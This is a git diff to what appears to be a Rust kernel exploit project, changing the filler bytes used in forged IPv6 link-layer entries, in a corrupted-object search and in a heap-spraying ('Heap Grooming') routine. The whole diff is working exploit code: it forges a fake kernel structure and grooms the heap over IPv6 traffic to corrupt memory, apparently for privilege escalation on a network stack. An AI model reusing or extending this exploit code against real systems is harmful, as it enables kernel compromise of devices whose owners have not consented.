diff --git a/src/constants.rs b/src/constants.rs index 18c4599..a00c4fa 100644 --- a/src/constants.rs +++ b/src/constants.rs @@ -83,5 +83,5 @@ pub const VM_PROT_ALL: u64 = VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE; pub const SOURCE_MAC: [u8; 6] = [0x41; 6]; pub const SOURCE_IPV6: [u8; 16] = [ - 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9f, 0x9f, 0x41, 0xff, 0x9f, 0x9f, 0x41, 0xff, ]; diff --git a/src/exploit/exploit.rs b/src/exploit/exploit.rs index af3767a..0cb361c 100644 --- a/src/exploit/exploit.rs +++ b/src/exploit/exploit.rs @@ -384,7 +384,7 @@ pub fn build_fake_lle( fake_lle.extend(&0u32.to_le_bytes()); // sin6_flowinfo let sin6_addr = 0xfe80000100000000u64.to_be_bytes(); fake_lle.extend(&sin6_addr); - let sin6_addr_2 = 0x4141414141414141u64.to_be_bytes(); + let sin6_addr_2 = 0x9f9f41ff9f9f41ffu64.to_be_bytes(); fake_lle.extend(&sin6_addr_2); fake_lle.extend(&0u32.to_le_bytes()); // sin6_scope_id diff --git a/src/exploit/utils.rs b/src/exploit/utils.rs index 48f351e..88a24fb 100644 --- a/src/exploit/utils.rs +++ b/src/exploit/utils.rs @@ -96,7 +96,7 @@ pub fn search_for_corrupted_obj( if i >= constants::HOLE_START && i % constants::HOLE_SPACE == 0 { continue; } - let source_v6_string = format!("fe80::{:04x}:4141:4141:4141", i); + let source_v6_string = format!("fe80::{:04x}:41ff:9f9f:41ff", i); let source_v6: [u8; 16] = std::net::Ipv6Addr::from_str(&source_v6_string) .expect("Failed to parse IPv6 address") .octets(); @@ -134,7 +134,7 @@ pub fn spray( print!("\r[+] Heap Grooming at {}%", progress); io::stdout().flush().unwrap(); - let source_v6_string = format!("fe80::{:04x}:4141:4141:4141", i); + let source_v6_string = format!("fe80::{:04x}:41ff:9f9f:41ff", i); let source_v6: [u8; 16] = std::net::Ipv6Addr::from_str(&source_v6_string) .expect("Failed to parse IPv6 address") .octets();